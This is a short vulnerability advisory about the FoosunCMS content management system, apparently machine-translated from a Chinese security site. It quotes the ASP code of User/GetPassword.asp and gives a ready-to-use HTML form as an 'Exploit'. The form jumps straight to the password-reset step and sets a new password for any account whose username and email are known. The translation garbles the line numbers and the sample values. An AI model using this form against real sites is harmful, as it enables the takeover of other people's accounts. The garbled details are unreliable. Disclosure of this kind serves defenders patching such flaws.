Wind news site management system any changes to password vulnerabilities-vulnerability warning-the black bar safety net

2010-07-05T00:00:00
ID MYHACK58:62201027478
Type myhack58
Reporter 佚名
Modified 2010-07-05T00:00:00

Description

FoosunCMS is a powerful feature of based on ASP+ACCESS/MSSQL architecture of content management software. Vulnerability analysis:

In the file\User\ GetPassword. asp:

ElseIf Request. Form("Action") = "step3" then //first 2 Line 8 Call step3 ()...... Sub step3() //the 1 9 8 row Dim p_pass_new,p_confim_pass_new p_pass_new = md5(Request. Form("pass_new"),1 6) ...... User_Conn. execute("Update FS_ME_Users set UserPassword ='"& amp; NoSqlHack(p_pass_new) &"' where UserName = '"& amp; NoSqlHack(StrUserName) &"' and Email = '"& amp; NoSqlHack(Replace(Request. Form("Email"),""",""))&"'") //third 2 2 row 0 The user can locally construct the form so that the program directly proceeds to modify the password, you'll need to know the user name and Mailbox.

Exploit:

<form id="form1" name="form1" method="post" action=<http://www.xxxx.com/User/GetPassword.asp>> <input name="Action" type="text" id="Action" value="step3" /> <input name="pass_new" type="text" id="pass_new" value="1 2 3 4 5 6" /> <input name="confim_pass_new" type="text" id="confim_pass_new" value="1 2 3 4 5 6" /> < input name="Email" type="text" id="Email" value="*@163.com*" /> <input name="UserName" type="text" id="UserName" value="Beijing" /> <input type="submit" name="Submit" value="submit" /> </form>